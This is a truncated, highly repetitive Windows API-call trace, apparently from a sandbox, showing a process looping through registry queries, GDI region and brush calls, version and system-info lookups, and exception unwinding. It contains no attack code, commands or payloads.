RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.667] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd10401dc [0089.667] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd30401d9 [0089.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045708 [0089.667] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045709 [0089.667] CombineRgn (hrgnDst=0x1045708, hrgnSrc1=0xd10401dc, hrgnSrc2=0xd30401d9, iMode=1) returned 1 [0089.667] CombineRgn (hrgnDst=0x1045709, hrgnSrc1=0xd10401dc, hrgnSrc2=0xd30401d9, iMode=4) returned 2 [0089.667] CreateSolidBrush (color=0xff) returned 0x2105707 [0089.667] CreateSolidBrush (color=0xff0000) returned 0x110570a [0089.667] DeleteObject (ho=0x110570a) returned 1 [0089.667] DeleteObject (ho=0xd30401d9) returned 1 [0089.667] DeleteObject (ho=0xd10401dc) returned 1 [0089.667] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.667] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.667] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.667] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.667] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.667] BeginPath (hdc=0x0) returned 0 [0089.667] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.668] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.668] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.668] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.668] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd40401d9 [0089.668] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd20401dc [0089.668] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104570b [0089.668] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104570c [0089.668] CombineRgn (hrgnDst=0x104570b, hrgnSrc1=0xd40401d9, hrgnSrc2=0xd20401dc, iMode=1) returned 1 [0089.668] CombineRgn (hrgnDst=0x104570c, hrgnSrc1=0xd40401d9, hrgnSrc2=0xd20401dc, iMode=4) returned 2 [0089.668] CreateSolidBrush (color=0xff) returned 0x210570a [0089.668] CreateSolidBrush (color=0xff0000) returned 0x110570d [0089.668] DeleteObject (ho=0x110570d) returned 1 [0089.668] DeleteObject (ho=0xd20401dc) returned 1 [0089.668] DeleteObject (ho=0xd40401d9) returned 1 [0089.668] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.668] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.668] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.668] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.668] BeginPath (hdc=0x0) returned 0 [0089.668] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.668] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.668] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.669] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.669] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd30401dc [0089.669] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd50401d9 [0089.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104570e [0089.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104570f [0089.669] CombineRgn (hrgnDst=0x104570e, hrgnSrc1=0xd30401dc, hrgnSrc2=0xd50401d9, iMode=1) returned 1 [0089.669] CombineRgn (hrgnDst=0x104570f, hrgnSrc1=0xd30401dc, hrgnSrc2=0xd50401d9, iMode=4) returned 2 [0089.669] CreateSolidBrush (color=0xff) returned 0x210570d [0089.669] CreateSolidBrush (color=0xff0000) returned 0x1105710 [0089.669] DeleteObject (ho=0x1105710) returned 1 [0089.669] DeleteObject (ho=0xd50401d9) returned 1 [0089.669] DeleteObject (ho=0xd30401dc) returned 1 [0089.669] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.669] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.669] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.669] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.669] BeginPath (hdc=0x0) returned 0 [0089.669] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.669] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.669] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.669] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.669] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.670] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.670] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.837] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd60401d9 [0089.837] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd40401dc [0089.837] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x96045723 [0089.837] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x304571f [0089.837] CombineRgn (hrgnDst=0x96045723, hrgnSrc1=0xd60401d9, hrgnSrc2=0xd40401dc, iMode=1) returned 1 [0089.837] CombineRgn (hrgnDst=0x304571f, hrgnSrc1=0xd60401d9, hrgnSrc2=0xd40401dc, iMode=4) returned 2 [0089.837] CreateSolidBrush (color=0xff) returned 0x2105710 [0089.837] CreateSolidBrush (color=0xff0000) returned 0x3105722 [0089.837] DeleteObject (ho=0x3105722) returned 1 [0089.837] DeleteObject (ho=0xd40401dc) returned 1 [0089.837] DeleteObject (ho=0xd60401d9) returned 1 [0089.837] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.838] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.838] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.838] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.838] BeginPath (hdc=0x0) returned 0 [0089.838] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.838] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.838] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.838] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.838] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.838] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.838] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.838] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd50401dc [0089.838] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd70401d9 [0089.838] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x2045725 [0089.838] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045726 [0089.839] CombineRgn (hrgnDst=0x2045725, hrgnSrc1=0xd50401dc, hrgnSrc2=0xd70401d9, iMode=1) returned 1 [0089.839] CombineRgn (hrgnDst=0x1045726, hrgnSrc1=0xd50401dc, hrgnSrc2=0xd70401d9, iMode=4) returned 2 [0089.839] CreateSolidBrush (color=0xff) returned 0x4105722 [0089.839] CreateSolidBrush (color=0xff0000) returned 0x1105727 [0089.839] DeleteObject (ho=0x1105727) returned 1 [0089.839] DeleteObject (ho=0xd70401d9) returned 1 [0089.839] DeleteObject (ho=0xd50401dc) returned 1 [0089.839] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.839] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.839] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.839] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.839] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.839] BeginPath (hdc=0x0) returned 0 [0089.839] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.839] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.839] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.839] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.839] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.839] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.839] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.839] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.840] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd80401d9 [0089.840] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd60401dc [0089.840] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045728 [0089.840] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045729 [0089.840] CombineRgn (hrgnDst=0x1045728, hrgnSrc1=0xd80401d9, hrgnSrc2=0xd60401dc, iMode=1) returned 1 [0089.840] CombineRgn (hrgnDst=0x1045729, hrgnSrc1=0xd80401d9, hrgnSrc2=0xd60401dc, iMode=4) returned 2 [0089.840] CreateSolidBrush (color=0xff) returned 0x2105727 [0089.840] CreateSolidBrush (color=0xff0000) returned 0x110572a [0089.840] DeleteObject (ho=0x110572a) returned 1 [0089.840] DeleteObject (ho=0xd60401dc) returned 1 [0089.840] DeleteObject (ho=0xd80401d9) returned 1 [0089.840] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.840] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.840] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.840] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.840] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.840] BeginPath (hdc=0x0) returned 0 [0089.840] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.840] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.840] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.840] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.841] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.841] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.841] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.841] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.841] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd70401dc [0089.841] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd90401d9 [0089.841] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104572b [0089.841] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104572c [0089.841] CombineRgn (hrgnDst=0x104572b, hrgnSrc1=0xd70401dc, hrgnSrc2=0xd90401d9, iMode=1) returned 1 [0089.841] CombineRgn (hrgnDst=0x104572c, hrgnSrc1=0xd70401dc, hrgnSrc2=0xd90401d9, iMode=4) returned 2 [0089.841] CreateSolidBrush (color=0xff) returned 0x210572a [0089.841] CreateSolidBrush (color=0xff0000) returned 0x110572d [0089.841] DeleteObject (ho=0x110572d) returned 1 [0089.841] DeleteObject (ho=0xd90401d9) returned 1 [0089.841] DeleteObject (ho=0xd70401dc) returned 1 [0089.841] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.841] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.841] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.842] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.842] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.842] BeginPath (hdc=0x0) returned 0 [0089.842] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.842] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.842] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.842] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.842] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.842] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.842] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.842] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.842] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda0401d9 [0089.842] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd80401dc [0089.842] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104572e [0089.842] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104572f [0089.842] CombineRgn (hrgnDst=0x104572e, hrgnSrc1=0xda0401d9, hrgnSrc2=0xd80401dc, iMode=1) returned 1 [0089.842] CombineRgn (hrgnDst=0x104572f, hrgnSrc1=0xda0401d9, hrgnSrc2=0xd80401dc, iMode=4) returned 2 [0089.842] CreateSolidBrush (color=0xff) returned 0x210572d [0089.842] CreateSolidBrush (color=0xff0000) returned 0x1105730 [0089.842] DeleteObject (ho=0x1105730) returned 1 [0089.842] DeleteObject (ho=0xd80401dc) returned 1 [0089.842] DeleteObject (ho=0xda0401d9) returned 1 [0089.843] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.843] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.843] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.843] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.843] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.843] BeginPath (hdc=0x0) returned 0 [0089.843] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.843] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.843] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.843] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.843] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.843] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.843] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.843] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.843] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd90401dc [0089.843] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb0401d9 [0089.843] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045731 [0089.843] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045732 [0089.844] CombineRgn (hrgnDst=0x1045731, hrgnSrc1=0xd90401dc, hrgnSrc2=0xdb0401d9, iMode=1) returned 1 [0089.844] CombineRgn (hrgnDst=0x1045732, hrgnSrc1=0xd90401dc, hrgnSrc2=0xdb0401d9, iMode=4) returned 2 [0089.844] CreateSolidBrush (color=0xff) returned 0x2105730 [0089.844] CreateSolidBrush (color=0xff0000) returned 0x1105733 [0089.844] DeleteObject (ho=0x1105733) returned 1 [0089.844] DeleteObject (ho=0xdb0401d9) returned 1 [0089.844] DeleteObject (ho=0xd90401dc) returned 1 [0089.844] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.844] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.844] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.844] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.844] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.844] BeginPath (hdc=0x0) returned 0 [0089.844] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.844] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.844] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.844] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.844] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.844] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.844] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.845] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc0401d9 [0089.845] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda0401dc [0089.845] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045734 [0089.845] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045735 [0089.845] CombineRgn (hrgnDst=0x1045734, hrgnSrc1=0xdc0401d9, hrgnSrc2=0xda0401dc, iMode=1) returned 1 [0089.845] CombineRgn (hrgnDst=0x1045735, hrgnSrc1=0xdc0401d9, hrgnSrc2=0xda0401dc, iMode=4) returned 2 [0089.845] CreateSolidBrush (color=0xff) returned 0x2105733 [0089.845] CreateSolidBrush (color=0xff0000) returned 0x1105736 [0089.845] DeleteObject (ho=0x1105736) returned 1 [0089.845] DeleteObject (ho=0xda0401dc) returned 1 [0089.845] DeleteObject (ho=0xdc0401d9) returned 1 [0089.845] GetVersionExA (in: 